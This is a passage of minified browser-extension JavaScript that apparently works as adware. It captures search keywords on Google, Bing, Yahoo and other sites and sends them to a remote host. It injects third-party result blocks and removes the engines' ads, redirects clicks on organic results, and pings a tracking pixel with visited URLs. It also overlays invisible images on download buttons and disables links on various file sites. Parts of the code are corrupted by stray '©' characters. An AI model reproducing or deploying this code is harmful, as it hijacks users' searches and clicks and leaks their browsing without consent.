g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=12403480529111048514&eid=721&pid=0&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom); if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"), c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\", function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak(); b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name; b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d, function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=12403480529111048514&eid=721&pid=0&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\")&&document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild&&(document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild.onclick=function(){return!1});if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var f=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),g=document.createElement(\"div\");\ng.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");g.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';f.style.position=\"relative\";f.appendChild(g)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(f=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),g=document.createElement(\"div\"),g.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),\ng.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',f.style.position=\"relative\",f.appendChild(g))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var f=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\nf.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},g=document.createElement(\"script\");g.type=\"text/javascript\";g[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+f.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(g)}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),\n$(\"#mp3-with-trinity\").remove()}catch(f){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(f=document.createElement(\"img\"),f.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),f.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\ng=document.getElementById(\"r1113566095\").parentNode,g.style.position=\"relative\",g.appendChild(f))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\n\")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"}\n-1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var f=[\"adv.php?\",\"/adv.php?\"],g=0;g<document.links.length;g++)for(var h=document.links[g],k=h.pathname+h.search,m=0;m<f.length;m++)f[m]==k.substr(0,f[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};\nif(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));\nif(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}}\nif(-1<document.location.host.indexOf(\"salvapantallas.com.es\"))for(b=0;b<document.links.length;b++)if(\"http://www.screensaverspc.com/\"==document.links.href.substr(0,30)){b=document.links.parentNode;b.style.position=\"relative\";a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";b.appendChild(a);break}\nif(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var f=document.getElementsByClassName(\"nasjfkla\"),g=0;g<f.length;g++)f[g].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div=link.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");\nb.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}}\n-1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var f=document.getElementById(\"leftside\"),g=0;g<f.children.length;g++)if(/\\bspnBook\\b/.test(f.children[g].className))for(var h=f.children[g].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3);\nif(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");\n(function(){var f=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var g=setInterval(function(){try{var 